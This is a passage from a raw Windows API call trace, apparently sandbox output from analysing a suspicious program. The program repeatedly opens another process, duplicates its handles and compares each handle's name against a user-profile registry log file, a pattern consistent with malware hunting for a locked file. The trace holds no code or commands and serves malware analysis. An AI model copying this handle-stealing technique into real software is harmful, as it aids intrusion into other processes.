lpThreadId=0x0) returned 0x670 [0152.798] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.799] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.799] CloseHandle (hObject=0x670) returned 1 [0152.799] CloseHandle (hObject=0x680) returned 1 [0152.799] CloseHandle (hObject=0x62c) returned 1 [0152.799] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.799] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.799] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.800] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.801] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.801] CloseHandle (hObject=0x670) returned 1 [0152.801] _wcsicmp (_Str1="\\CatalogChangeListener-370-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.801] CloseHandle (hObject=0x680) returned 1 [0152.801] CloseHandle (hObject=0x62c) returned 1 [0152.801] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.801] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.801] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.802] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.803] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.803] CloseHandle (hObject=0x670) returned 1 [0152.803] CloseHandle (hObject=0x680) returned 1 [0152.803] CloseHandle (hObject=0x62c) returned 1 [0152.803] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.803] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.803] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.804] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.806] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.806] CloseHandle (hObject=0x670) returned 1 [0152.806] CloseHandle (hObject=0x680) returned 1 [0152.806] CloseHandle (hObject=0x62c) returned 1 [0152.806] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.806] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x520, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.806] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.806] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.808] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.808] CloseHandle (hObject=0x670) returned 1 [0152.808] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.808] CloseHandle (hObject=0x680) returned 1 [0152.808] CloseHandle (hObject=0x62c) returned 1 [0152.808] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.808] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.808] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.809] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.809] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.810] CloseHandle (hObject=0x670) returned 1 [0152.810] _wcsicmp (_Str1="\\MOF", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.810] CloseHandle (hObject=0x680) returned 1 [0152.810] CloseHandle (hObject=0x62c) returned 1 [0152.810] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.810] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x68c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.810] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.811] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.811] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.811] CloseHandle (hObject=0x670) returned 1 [0152.811] CloseHandle (hObject=0x680) returned 1 [0152.811] CloseHandle (hObject=0x62c) returned 1 [0152.811] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.811] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x788, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.811] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.815] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.816] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.816] CloseHandle (hObject=0x670) returned 1 [0152.816] CloseHandle (hObject=0x680) returned 1 [0152.816] CloseHandle (hObject=0x62c) returned 1 [0152.816] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.816] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.816] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.817] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.817] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.817] CloseHandle (hObject=0x670) returned 1 [0152.818] CloseHandle (hObject=0x680) returned 1 [0152.818] CloseHandle (hObject=0x62c) returned 1 [0152.818] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.818] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.818] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.818] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.819] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.819] CloseHandle (hObject=0x670) returned 1 [0152.819] CloseHandle (hObject=0x680) returned 1 [0152.819] CloseHandle (hObject=0x62c) returned 1 [0152.819] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.819] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.819] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.820] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.820] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.821] CloseHandle (hObject=0x670) returned 1 [0152.821] CloseHandle (hObject=0x680) returned 1 [0152.821] CloseHandle (hObject=0x62c) returned 1 [0152.821] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.821] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.821] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.821] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.822] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.822] CloseHandle (hObject=0x670) returned 1 [0152.822] CloseHandle (hObject=0x680) returned 1 [0152.822] CloseHandle (hObject=0x62c) returned 1 [0152.822] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.822] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x8fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.822] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.823] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.824] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.824] CloseHandle (hObject=0x670) returned 1 [0152.824] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.824] CloseHandle (hObject=0x680) returned 1 [0152.824] CloseHandle (hObject=0x62c) returned 1 [0152.824] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.824] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x954, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.824] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.825] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.827] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.827] CloseHandle (hObject=0x670) returned 1 [0152.827] _wcsicmp (_Str1="\\MAPPING1.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.827] CloseHandle (hObject=0x680) returned 1 [0152.827] CloseHandle (hObject=0x62c) returned 1 [0152.827] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.827] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x958, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.828] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.830] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.830] CloseHandle (hObject=0x670) returned 1 [0152.830] _wcsicmp (_Str1="\\MAPPING2.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.830] CloseHandle (hObject=0x680) returned 1 [0152.830] CloseHandle (hObject=0x62c) returned 1 [0152.830] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.830] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x95c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.830] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.831] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.832] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.832] CloseHandle (hObject=0x670) returned 1 [0152.832] _wcsicmp (_Str1="\\MAPPING3.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.832] CloseHandle (hObject=0x680) returned 1 [0152.832] CloseHandle (hObject=0x62c) returned 1 [0152.832] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.832] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x960, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.833] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.833] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.835] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.835] CloseHandle (hObject=0x670) returned 1 [0152.835] _wcsicmp (_Str1="\\OBJECTS.DATA", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 1 [0152.835] CloseHandle (hObject=0x680) returned 1 [0152.835] CloseHandle (hObject=0x62c) returned 1 [0152.835] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.835] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x964, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.835] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.836] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.837] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.837] CloseHandle (hObject=0x670) returned 1 [0152.837] _wcsicmp (_Str1="\\INDEX.BTR", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0152.837] CloseHandle (hObject=0x680) returned 1 [0152.837] CloseHandle (hObject=0x62c) returned 1 [0152.837] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.837] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x9a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.840] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.841] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.841] CloseHandle (hObject=0x670) returned 1 [0152.841] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.841] CloseHandle (hObject=0x680) returned 1 [0152.841] CloseHandle (hObject=0x62c) returned 1 [0152.841] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.841] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa2c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.841] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.842] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.843] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.843] CloseHandle (hObject=0x670) returned 1 [0152.843] _wcsicmp (_Str1="\\DataStore.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0152.843] CloseHandle (hObject=0x680) returned 1 [0152.843] CloseHandle (hObject=0x62c) returned 1 [0152.843] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.843] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa70, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.843] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.844] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.845] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.845] CloseHandle (hObject=0x670) returned 1 [0152.845] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.845] CloseHandle (hObject=0x680) returned 1 [0152.845] CloseHandle (hObject=0x62c) returned 1 [0152.845] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.845] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa78, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.845] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.846] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.847] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.847] CloseHandle (hObject=0x670) returned 1 [0152.847] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.847] CloseHandle (hObject=0x680) returned 1 [0152.847] CloseHandle (hObject=0x62c) returned 1 [0152.847] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.847] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xba0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.847] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.848] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.849] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.849] CloseHandle (hObject=0x670) returned 1 [0152.849] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -8 [0152.849] CloseHandle (hObject=0x680) returned 1 [0152.849] CloseHandle (hObject=0x62c) returned 1 [0152.849] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.849] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.849] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.850] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.850] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.850] CloseHandle (hObject=0x670) returned 1 [0152.850] _wcsicmp (_Str1="\\CIMV2SCM EVENT PROVIDER", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0152.850] CloseHandle (hObject=0x680) returned 1 [0152.851] CloseHandle (hObject=0x62c) returned 1 [0152.851] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.851] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.851] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.851] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.852] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.852] CloseHandle (hObject=0x670) returned 1 [0152.852] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0152.852] CloseHandle (hObject=0x680) returned 1 [0152.852] CloseHandle (hObject=0x62c) returned 1 [0152.852] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.852] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1114, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.852] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.853] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.854] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.854] CloseHandle (hObject=0x670) returned 1 [0152.854] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0152.854] CloseHandle (hObject=0x680) returned 1 [0152.854] CloseHandle (hObject=0x62c) returned 1 [0152.854] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.854] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.854] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.855] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.856] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.856] CloseHandle (hObject=0x670) returned 1 [0152.856] CloseHandle (hObject=0x680) returned 1 [0152.856] CloseHandle (hObject=0x62c) returned 1 [0152.856] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.856] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.856] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, 